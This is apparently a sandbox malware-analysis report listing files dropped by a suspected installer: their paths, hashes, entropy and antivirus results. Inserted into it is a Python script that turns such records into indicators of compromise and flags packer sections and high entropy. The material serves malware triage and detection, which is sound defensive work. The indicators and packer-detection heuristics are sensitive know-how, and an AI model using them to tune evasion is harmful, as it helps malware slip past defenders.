Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.]....Q......!.........p....................Pj.........................@......).....@... ......................@..n/...p..........@............................................................................s..(............................text...X...........................`.P`.data...D...........................@.0..rdata..|/.......0..................@.`@.bss.........0........................`..edata..n/...@...0..................@.0@.idata.......p.......@..............@.0..CRT....,............Z..............@.0..tls.... ............\..............@.0..rsrc...@............^..............@.0..reloc...............f..............@.0B/4...................v..............@..B/19...../}.......~...|..............@..B/31.....gr...`...t..................@..B/45.....#............n..............@..B/57.....<X.......Z..................@.0B/70......B.......D...x..
C:\Program Files (x86)\lighteningplayer\data_load.exe
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):587776
Entropy (8bit):6.439962628647099
Encrypted:false
SSDEEP:12288:myyKdVnyNhXCV4EkP7AIfzNXZ0b5NrnkcAqIV0A1caRI:mKvyNhXCV4E8BXAfrnkcAqU0A
MD5:42BADC1D2F03A8B1E4875740D3D49336
SHA1:CEE178DA1FB05F99AF7A3547093122893BD1EB46
SHA-256:C136B1467D669A725478A6110EBAAAB3CB88A3D389DFA688E06173C066B76FCF
SHA-512:6BC519A7368EE6BD8C8F69F2D634DD18799B4CA31FBC284D2580BA625F3A88B6A52D2BC17BEA0E75E63CA11C10356C47EE00C2C500294ABCB5141424FC5DC71C
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.rR9p..9p..9p..Bl..;p...l.. p...V..[p...xC.8p..9p...p...xA.>p...V...p..V....p..V...;p...v..8p..Rich9p..................PE..L....S.L............................L.............@.........................................................................\...P.......(...............................................................................P............................text............................... ..`.rdata..............................@..@.data............l..................@....sxdata.............................@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................
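The dropped-file records above are the report's own "Key:Value" lines, and the triage signals a practitioner reads off them are visible in the data: md8_8eus.exe has 8-bit entropy of 7.94 and .vmp0/.vmp1 section names in its preview bytes (VMProtect), while the ESE database tmp.edb sits at 0.29 with no detections. The following Python is an added example, not part of the Joe Sandbox report, that parses such records into IOCs and flags those signals; it also reimplements Shannon byte entropy, which is how an "Entropy (8bit)" value is conventionally computed. The sample text is constructed from two abbreviated records on this page; the thresholds HIGH_ENTROPY and MIN_DETECTION_PCT and the packer section-name list are assumptions, not the sandbox's rules.

```python
"""Parse Joe Sandbox 'Dropped Files' records into IOCs with triage flags.

Added example; not code from the sandbox report. SAMPLE is constructed from
two abbreviated records on the page. Thresholds and the packer section list
are assumptions.
"""
import math
import re
from collections import Counter

# Field names used by the report. A 'Key:Value' line whose key is not listed
# here (e.g. 'C:\Program Files ...') is treated as the path that opens a record.
FIELDS = {
    "Process", "File Type", "Category", "Size (bytes)", "Entropy (8bit)",
    "Encrypted", "SSDEEP", "MD5", "SHA1", "SHA-256", "SHA-512",
    "Malicious", "Antivirus", "Preview",
}
AV_LINE = re.compile(r"^•\s*Antivirus:\s*(?P<engine>[^,]+),\s*Detection:\s*(?P<pct>\d+)%")
# Section names that indicate a commercial packer (assumed list, not exhaustive).
PE_SECTION = re.compile(r"\.(vmp\d|upx\d)\b", re.IGNORECASE)

HIGH_ENTROPY = 7.2        # assumed: bits/byte above this suggests packing/encryption
MIN_DETECTION_PCT = 50    # assumed: at least one engine family reporting >= 50%


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), as in 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_records(text: str) -> list:
    """Split report text into records: one dict per dropped file."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = AV_LINE.match(line)
        if m and cur is not None:
            cur.setdefault("av", []).append((m["engine"].strip(), int(m["pct"])))
            continue
        key, sep, value = line.partition(":")
        if sep and key in FIELDS:
            if cur is None:            # record whose path line fell outside the excerpt
                cur = {"path": None}
                records.append(cur)
            cur[key] = value.strip()
        else:                          # any other line opens a new record with its path
            cur = {"path": line}
            records.append(cur)
    return records


def triage(rec: dict) -> dict:
    """Reduce one record to an IOC with the flags an analyst would act on."""
    ent = float(rec.get("Entropy (8bit)", 0))
    detections = [pct for _, pct in rec.get("av", [])]
    sections = sorted({s.lower() for s in PE_SECTION.findall(rec.get("Preview", ""))})
    flags = []
    if rec.get("Malicious") == "true":
        flags.append("sandbox-malicious")
    if ent >= HIGH_ENTROPY:
        flags.append("high-entropy")
    if sections:
        flags.append("packer-sections:" + ",".join(sections))
    if detections and max(detections) >= MIN_DETECTION_PCT:
        flags.append("multi-av")
    return {"path": rec.get("path"), "sha256": rec.get("SHA-256", "").lower(),
            "dropped_by": rec.get("Process"), "entropy": ent, "flags": flags}


# Constructed from two records on this page, abbreviated (previews shortened).
SAMPLE = r"""
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):732160
Entropy (8bit):7.942489477959937
Encrypted:false
SHA-256:288376E11301C8CA3EB52871D09133F0199B911A33B9658579929EF6BAC8EA6C
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 34%
• Antivirus: ReversingLabs, Detection: 93%
Preview: MZ......This program cannot be run in DOS mode....PE..L.....text...6s....rdata.....data.....vmp0....~....vmp1...4$....reloc....
C:\Program Files (x86)\Company\NewProduct\tmp.edb
Process:C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x76335dd9, page size 32768, JustCreated, Windows version 0.0
Category:dropped
Size (bytes):196608
Entropy (8bit):0.2862983094388781
Encrypted:false
SHA-256:4F7276CF7BB43C99D223FC8F380317564504C35EDDC6668611DD7F06EFDE74EE
Malicious:false
Preview: v3].... .......@.......O4.7.....y....
"""

if __name__ == "__main__":
    for ioc in map(triage, parse_records(SAMPLE)):
        print(ioc)
```

The parser keys records on the report's known field names rather than on a leading path pattern, so the first record of an excerpt still parses when its path line is missing, as it is at the top of this section. Note that the report marks md8_8eus.exe as Encrypted:false despite its 7.94 entropy; the flags here are an analyst's heuristic layered on the report, not a restatement of it.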
C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:Hierarchical Data Format (version 5) data
Category:dropped
Size (bytes):92388
Entropy (8bit):5.836011280390705
Encrypted:false
SSDEEP:768:8CQBvT4/rH2BZ+erbMgoMinMG3LWZD/tbb2XNwC3JpSbDz9WGuT614cy:8CQB7+HOkerbeM8KZpSfzYhu0a
MD5:769E358ABE26E0565B44F860213B9BC1
SHA1:A22B5AEFD62A59F7FFDE3AAFDD94B4EF14D7CAEC
SHA-256:05CA927052CF83663B29546B06998B03EA7FBCD288F7C99E7AF8B215AC77EC4E
SHA-512:416CDDDE3CB0B0DC4C3140834A8D8E09DCE1AF0D6B6DBFF58B4CCFBBF0468724D0C1A6F9FFB13461AF795146CA6280BED3A7AFC102449C853FE287E0951E54A8
Malicious:false
C:\Program Files (x86)\lighteningplayer\libssp-0.dll
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):31763
Entropy (8bit):6.036627357183098
Encrypted:false
SSDEEP:384:tI0Cfegmp9qdYjxcXT1/OhILLSQ5YrPSpAWVmsANKyU4LZpwecObw9q5z5l84N9z:tbCmgfwxcRKQ5YrqssPUZpSvw24A9C
MD5:699698E37059AB4677549592DB2BF6C3
SHA1:975BD1E10413369941FFBD3D053A530CE31CB333
SHA-256:6315EAE539E153B3F722E92C7DE7415813E51986E9D17E7013BB8128F9FACE3A
SHA-512:68F6ADC02003C6491F2B7AAD7B1F66687E38AB352AAA1D9825CC5391C21B88E65AEDFD2EE8E046F19447A6F363B2906E51B4939EA06D2B97785B67FF5CC8801A
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
C:\Program Files (x86)\lighteningplayer\libvlc.dll
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):851498
Entropy (8bit):5.999129725124293
Encrypted:false
SSDEEP:12288:FIsudTRfCgj+dcpdCBEO4T1OR62/nDVygvK8F4Kq:msudTh5UUwEO4TI5DVyiK8F4Kq
MD5:3F0352C50C92AA9F8659CD9FF8F77181
SHA1:1E9283284471B8C7B27F506B1CBA3A16624AE725
SHA-256:6DAD82E52827E9BFAA91831947BA351FDDA5CA8564DCA46FA0220F35933FC22D
SHA-512:F93CC8AD89D9DE76AA51AED371F7CE8EB975CFC4AD2C7C78D71E9EE1465E43A9E1B17BFA8C6B8974B1B9BC210E4139D9B18221C0863EAEC0BD201178B0E74AD3
Malicious:false
C:\Program Files (x86)\lighteningplayer\libvlccore.dll
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):9859938
Entropy (8bit):6.424131964777554
Encrypted:false
SSDEEP:98304:CNEA9tFqRKJ78rhWYH0Nm6rBlBAUZLX0BpyQCWiJAU1h+TKeIkiLAYtwDPY1Jcxe:CNEA9tFqRKJ78rN0NmmlVr7HGiLCY1ac
MD5:CB68F6C3FEEC4AF4E8221FE827FD27FB
SHA1:CC8221E8F52270421597B55AFF37532140EB7C89
SHA-256:7A4FC1DB558366153CE01674D585D34E2BC8FC9360684D71DA5BE6AB355FDF5A
SHA-512:F018DC9B5C0B27A67B53F162F2C6C3FAB73A139E112AEC92C7FC68B5F378F50C47DAC90A4EBC08150B6372EF5743C97CCE28914376CE0A54874E48FA9C57977E
Malicious:false
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):254784
Entropy (8bit):5.544387213816278
Encrypted:false
SSDEEP:3072:p3ynqvwsyj9cpI/dG99XnUATXRl2IfLWA7u5Ku1oflwuk+BiewP:p3yqYsmcpL9pnUADTfLWA7ugmWu
MD5:FD3B4B41E95F42CE084461EC5A63BA7D
SHA1:D6B9498F93E624D3AF39433A12EBBDD7B7EE3D08
SHA-256:C498E9A13E5BC07EAF60971949A8E441D8885D6DDC64CC73037BC501E9E83532
SHA-512:76AB3EF089EC5A020F076B1B2A9FC66AE77F0F496B743C2F0C0E91669110601A83AC71A3DC58B01E51E0F1819008666ECE23F22B8AA65D9BC1E906D4367E8550
Malicious:false
C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):248960
Entropy (8bit):5.494907007841999
Encrypted:false
SSDEEP:3072:gikOk4pxx8cpdG99mDyyLVi+oeA7ukJwmhJ9lwuwoJYjF:zkOlxx899sDDBPA7uLmSh
MD5:50A833D4031BC5D73968BB09985C9AF1
SHA1:0CADD71AFEB846C01AA0BBE7534307A06FC924DB
SHA-256:DB871A0F3C13504B0DD296A91BD03132A031ED12C8449C3F2CDDE438A8615197
SHA-512:A6B9D2B34C30BCE4752B3FEA27B7BD7A76104CE3B5F2C6EBAACB33682C05AE4F2EAEB061DDD6BEB34D2633B20CCE341F7A1A5ED9835D12B397CD0A686D413735
Malicious:false
C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:MS Windows icon resource - 1 icon, 64x64, 32 bits/pixel
Category:dropped
Size (bytes):16958
Entropy (8bit):1.082731295825109
Encrypted:false
SSDEEP:12:PRamDOEaRXzPuOONxER5AM/8CiLGLOuez7hP3poqsvXQ9vvHV3:P0mDOEahzPuOONxER57/wa3WhwXQtV3
MD5:D063C3E8CECE712E80485902388D3C0C
SHA1:54E12FC6F1243AC4C132ED49E4801BB6EB39A06F
SHA-256:0ECD14DF82076BA66C5277B91D58DE4FA2417DDFE36A0673670BE0D8FB999FD0
SHA-512:E1DC4B28513D3366C8143DD6B0186248967B909BDF8779F67D86CE32626C3C04AF2BCB03014273A9EEAE481EE361BE3BD5D540CF2CE46CEF3429071EE3B67FB2
Malicious:false
C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:Lua bytecode, version 5.1
Category:dropped
Size (bytes):75534
Entropy (8bit):4.998886409993974
Encrypted:false
SSDEEP:1536:+TaAy7SeKnMCqwwaIVvVx1wmhHCH2PQkkkkk7d:szLeKnMCnkvVEmtbd
MD5:F8979EB0AA8A72FDF2E8F3A32017BD73
SHA1:6CA87524946C3A9C4C2A8DCE0451786DB7BEB8F4
SHA-256:D0BCE6A2BA2C2C01CC2294A5AC50C92AEAF0FD8689740F8810613B7B5F6CE442
SHA-512:A0879C175090E5AAED152C9C41B6E92942FCDE8F900BC2445103432AD0CDCD0B1ABE94B0E8F239B63D2E18D0D0F21D22B50D8B0F8EC98E84EE81BAE645D5BD65
Malicious:false
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3817
                                                                                                                                                                                      Entropy (8bit):5.091276264043097
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:FiwrDEKaCCGPY+B5RfDLDkQVLEygqeNnG0Ln0yoESZCoyiAjuHH1/8Hs5SU:FjtaC/RrfDLDJVoyiNrLDoPJwskU
                                                                                                                                                                                      MD5:D22172DD6172684093F09DD792E7895E
                                                                                                                                                                                      SHA1:6A71F72C19E862EAC6F98883290A9588E020F087
                                                                                                                                                                                      SHA-256:F9A95D835F65815715E8366B16E6A780D635307BB5DC67AC54EBD74732E49363
                                                                                                                                                                                      SHA-512:555A7C47DBD571FABDEDE9A5E135627D2625D418648462F27BD4707AA5A83A1DBEB6729FD851C258183E6C4AE9A75634A2C15129FF24AB5EC97B5EE1412318D0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: root { .. display: block;..}..body{..}..#mainContainer{...text-align: center;...width: 800px;..}..#controlContainer{...width: 800px;..}..#libraryContainer{...width: 800px;...margin-top: 2px;..}..#libraryTree{...height: 300px;...overflow: auto;...white-space: nowrap;...text-align: left;..}..#viewContainer{...width: 800px;..}..#mediaViewer{...min-height: 500px;...background-color:#222;..}..#player{...top:0px;...height: 500px;...width: 500px;...background-color:#222;..}..#seekSlider{...width: 98%;...margin-left:5px;..}..#volumeSlider{...width: 100px;...display: inline-block;..}..#currentVolume{...display: inline-block;..}..#mediaTitle{...position: absolute;...top: 0px;...left: 10px;...width: 600px;...text-align: center;...padding: 5px;...overflow: auto;..}..#currentTime{...margin-top:-40px;...float: left;...text-align: left;..}....#totalTime{...margin-top:-40px;...float: right;...text-align: right;..}....#controlTable{...position:relative;...height: 150px;..}..#controlButtons{...positi
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2850
                                                                                                                                                                                      Entropy (8bit):5.147113070909875
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:F/JotS50w8LUB3I0YBCG/AW+whOif5p/6Zo93EyiAj4HHH1/8udqJB15ouiHgt:F/JoI50PEY0sT/AHwgiBwo93EyiAjuHs
                                                                                                                                                                                      MD5:C32EA1F5680C3FAA5B10A037C0471543
                                                                                                                                                                                      SHA1:ABC162B4435F972BA57382CF066622848E7B02DE
                                                                                                                                                                                      SHA-256:F5FCECF622743134645E16015C3E8B03E83A2EB4DD00C4CD6D5DC287A016C1E8
                                                                                                                                                                                      SHA-512:2EC6BD9AA285E3FD5587BBCE60226675B661E25346F79FB3C7803F0F9ADA40301033AA312AA3E35225F8B519CB3FA1FF386B596E32223B484378CE2B2E7DD0B6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: root { .. display: block;..}..#content{....}..body{...font: 11pt Helvetica, Arial, sans-serif;...background-color:#EEE;...margin: 0px;..}....#libraryTree{...height: 300px;...overflow:scroll;...white-space: nowrap;...text-align: left;..}....#mediaViewer{...min-height: 500px;..}..#meta {...position:relative;...width:100%;..}..#seekSlider{...width: 100%;..}....#volumeSlider{...width: 100%;...display: inline-block;..}..#currentVolume{...display: inline-block;..}..#mediaTitle{...text-align:center;...width:100%;...margin-top:5px;..}..#currentTime{...float: left;...text-align: left;..}..#totalTime{...float: right;...text-align: right;..}..#play_controls, #controls{...margin-top:30px;...width:95%;...margin-left:auto;...margin-right:auto;..}....#controlTable{...position:relative;...height: 150px;..}....#buttonszone li{...float: left;..}....#art{...top:0px;...width:150px;...height:150px;...margin:0 auto;...box-sizing:border-box;...-webkit-box-sizing:border-box;..}.....ui-slider-range{...backg
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):201
                                                                                                                                                                                      Entropy (8bit):6.382857878349319
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlVXtamP0qJVo415T5qjYaOwyHBS9ftZgB5roo2mSs+vfB1p:6v/lhPnPbVo41+jYakhgtq5rpKfjp
                                                                                                                                                                                      MD5:139B9F8B50309295D4632C927F2060D3
                                                                                                                                                                                      SHA1:182E0E40EA9CE075D70DAC695CE89B2F8C215A11
                                                                                                                                                                                      SHA-256:ADB182BF32D80030963BFAE7079295B8C35085A85CF5A0FE28046DB1B4836E7F
                                                                                                                                                                                      SHA-512:6B911D31C467D2A5BF3B82D57403786CDCD1737DAAB148DEDDA65885EE88A6BB5E9CBE98F06DB415AD0F68F5A3DF569135A76DC39D457F02192CDEFB05A4719E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):197
                                                                                                                                                                                      Entropy (8bit):6.443060947472863
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlVXtZbKpgK22jyHY38jnQHlB552S5kLgrZMFo3P1pOIa+UQ+4NWIHn:6v/lhPvbyqHYMLQHlP52KCgreGNcx4dp
                                                                                                                                                                                      MD5:387DC16210273E62FFAE06972E45CBAC
                                                                                                                                                                                      SHA1:74A7E1BF795A281541C6B2CEAF77060681E64D5D
                                                                                                                                                                                      SHA-256:C6133633C005B1C344F4AE682811157A366AF0F9F637EE4FB65E896FFBF0D71E
                                                                                                                                                                                      SHA-512:D9BA6BFAF86838A8EB4E0D598B18AED18D215470E97A3DAE8BA22A4485C18A5B57DD8FC046A2DB63D36E1C066FDCFD941688892A1D6F11D9FFB95B254063C8E2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 40 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):147
                                                                                                                                                                                      Entropy (8bit):3.900126810970078
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlVbtr/okx2lVbaRbErFXAsnQ/ljp:6v/lhPWkUv+R3GQ/Vp
                                                                                                                                                                                      MD5:EBFE0256941F757936125A104DD0E47F
                                                                                                                                                                                      SHA1:F568D061917EB74853C955DD2DC87E098A1A49F2
                                                                                                                                                                                      SHA-256:61B9E46D291ED3D7800CBC899B7EDCB95327D16CD61085BB515381AF32BC1469
                                                                                                                                                                                      SHA-512:0205E91039AD8A244EB7A3B252524C4F5102202F1DE2DF70F7D5DEDA5677F80946025E57CDC044C651D517D3488E130581811A97B8275F9F2359ED725E771A89
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 1 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):103
                                                                                                                                                                                      Entropy (8bit):5.361402854695405
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlE8SWlLIIcWZDcREDXviwtff9Kltjp:6v/lhPhSWlkACRsvig39KTp
                                                                                                                                                                                      MD5:9D668FB893225B8AEB91FE21D2BBEE9A
                                                                                                                                                                                      SHA1:0E2D4E277CCABA84F60F1F9D6C5AA27BF4F5386A
                                                                                                                                                                                      SHA-256:49D57607054D07581044A39025EA0FF623185D5E8117B7325084DB098795298D
                                                                                                                                                                                      SHA-512:28FB253FD7EBCEC54AA2594766A244E7ADC704F828DFC4E1607F756B221EFDC255999FE0970BD7B575E16A303B6DFD656880BA8F60EAAEAF812DA7727AE7599C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 1 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):115
                                                                                                                                                                                      Entropy (8bit):5.65440061388422
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlE8SWlfMqEza7yZpnLnD2F0b1p:6v/lhPhSWl0qEz9XnrqeZp
                                                                                                                                                                                      MD5:93A180CF88DD02C712A0F1ADB69F201C
                                                                                                                                                                                      SHA1:10E7AFEE0D86AEF1D82CD9EDF3A9A323DB8696BE
                                                                                                                                                                                      SHA-256:1A9CB0100308C590BD17ACE4D3541DAB56CD982AF721D0B2EA67F5D746DCAB5F
                                                                                                                                                                                      SHA-512:DC8F6F17C37FDBD7300CC8596F55186AD0118F92670DB3FDA43CECD2BD62B800AF5B4DB2B16E2EAAD8BB50E083D4B581453BEFD1054841876A8BD08009F01278
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 1 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):95
                                                                                                                                                                                      Entropy (8bit):5.24924390405304
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlE8SWlD9/TjOAMHizjVHlc/lp1p:6v/lhPhSWlkFizRi/lbp
                                                                                                                                                                                      MD5:6BDAA44E692C036B6E478B5AB08B2687
                                                                                                                                                                                      SHA1:AAC8D38E7AD1FE569B77923B2CDE3DA6FDD71A40
                                                                                                                                                                                      SHA-256:29043EC911594970261AB6C5E03DE903C1161ED13A25A377449C9C3B22134C28
                                                                                                                                                                                      SHA-512:E078684D7CAA6BA9CC5CC324325DC5C3309A8EEE8178DF55799A61B554B324FB2FB80723B4EEF163A1FA25109101F5CB8DBE290BEA5106B4444112453D615250
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 500 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2627
                                                                                                                                                                                      Entropy (8bit):7.635988555591565
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:fPCXt8ReNPK52y1n5MXo3Xnl3/kBziGXtCVeZjWk0YU5pQzfIZoPRs7bX8tDhF:fPCqg9K52yp5M4nl3/Q54VeZf0rZO27M
                                                                                                                                                                                      MD5:4B92DDCABFD72C2E4CC1D4825542D8D9
                                                                                                                                                                                      SHA1:D007D4344BE5703F1DDD8A9DFE443CE6F4CA71BB
                                                                                                                                                                                      SHA-256:0307F13B51F07C8D10EDE9B29C8F43CB02024FCD2D69F04A26600A4244846AC0
                                                                                                                                                                                      SHA-512:88A780A0EDA257555F7E1BBD4E1120D1BFC2744736F77DCDF78F97595FBBF54F6CCA536A3E8860F9B3838E9E6BB6E7A5E9AC288BB7E1DC7F8E845B342DD7FF40
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR.......d.....p..}....IDATx...m{...q~.].&z....d[.+...c....a..L..'.UB...}@0...._-. .....[........[E.........:........:...t..@A....t..@A.......(........(...P........P.........:........:......p.........u....@A....t..P......7...c....[}...k........._H,..Rc..=..+..8bsK./5..x....'.l+O..I.%.6..9...1....)qW..[.T.x...y...}..2Fk?...XlS.[.L.k.....n.u..V.U...~P....u.)...'.R....y....@A....t..P...3...u....@A....Q...Q.F..6.v..9.....tO........s..XK.G...k..q...;.9k....9.Mnn{c..on.......*..9...>I.p.y..R.(..-...Y?R.Nj....>..w.....n.s....cJ..f....i.;.9.q.ol......U"oR..q.s..|...D...3g>j....._......J..}.Y.....s.9.:Gnu...f.`....9P.K~...h(...\tA.vw....{R.......s.64.T_..Z.RsJ./.Z}.2.i...Z.8[s..(.k+'....l.5..+F....xj.R9..wV,....~l.j.[sM.C.'+...{X.f...w...[yf..S....jn..#uO.u.ZgWj..=d.c....2.....t.....7...F.k...6...{J.....V.e.j....!.;1..8Ysh....k.s..NX.....*.m..W..Z.&#..~J..z...#.1Z{c.X.&#.....Q.X...7..6..RqR.q....Ry.....N|V..9#.z...V;;..tB...5
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 1 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):88
                                                                                                                                                                                      Entropy (8bit):5.047920261721794
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlEbtqNl6s0ffiaDgafWMA91lr02qg1p:6v/lhPGugLizyWvvgbup
                                                                                                                                                                                      MD5:E61F2C0C8FCB00498F21B2F3DB1E3208
                                                                                                                                                                                      SHA1:88E3777E42B562FF111BAB862A89264DA36C5FBC
                                                                                                                                                                                      SHA-256:983C3DE6ADC1D836B26E97BCB87CB29FB5B31B2FC87AE78563BD6E328907667B
                                                                                                                                                                                      SHA-512:B7156B6D0CAD02DCA8E981326C28C0E8DBFD94C1D405F289F96F04BEE4E59F3BBEAE287A2A431084655C79F2B0D62DBEEA0DE607604BA49B8F8C67716C43B459
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR.......d.....G,Z`....IDAT.Wc.....&. .B.....s)a..N....".........IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 1 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):126
                                                                                                                                                                                      Entropy (8bit):5.63027377736586
